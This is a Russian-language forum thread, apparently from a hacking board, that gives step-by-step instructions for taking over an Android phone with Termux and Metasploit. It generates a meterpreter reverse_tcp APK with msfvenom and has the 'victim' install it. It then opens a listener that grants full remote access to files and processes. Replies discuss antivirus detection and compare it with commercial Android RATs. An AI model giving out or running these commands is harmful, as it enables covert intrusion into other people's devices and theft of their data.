Termux и Metasploit: Взлом андроида

[shad0w]

Нам понадобится смартфон или планшет с установленной программой "Termux".
Также в Termux уже должен быть установлен "Metasploit".
pkg update
Далее нужно перейти по следующему пути, введя команду
/data/data/com.termux/files/usr/opt/metasploit-framework
Введя команду ls вы должны увидеть примерно это:

Теперь создаем файл который будем кидать жертве, командой
msfvenom -p android/meterpreter/reverse_tcp LHOST=(наш IP) LPORT=4444 R> /
sdcard/payload.apk
Я создал файл, который хранится в пути /sdcard/payload.apk

Теперь нужно скинуть его жертве и жертва должна установить этот apk файл на
своё устройство. Допустим жертва установила apk на своё устройство. Мы же
запускаем metasploit и поочередно вводим каждую команду
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST (наш тот же IP)
set LPORT 4444
exploit
Если всё прошло успешно, вы получите полный доступ к устройству жертвы. Введя
команду help можно будет посмотреть список доступных команд. Вкратце
расскажу, что можно будет сделать:
Скачивать, удалять файлы жертвы
Скидывать в его устройство свои файлы
Посмотреть полную информацию о его устройстве
Контролировать процессы устройства.

 

[RedBull]

Так-то очень старый метод... Что по детектам? палится больше чем спайнот или спаймакс?

 

[RedBull]

Ну да, но тут чисто терминаловская версия, есть андроид-раты под интерфейс, но не видел в продаже, а старые не актуальны по палеву

 

[BLUA]

слишком долго , легче напрямую через метасплойт подключиться к телефону через кремета

 

[BianHunter]

Я так и не понял чей айпи надо и где его взять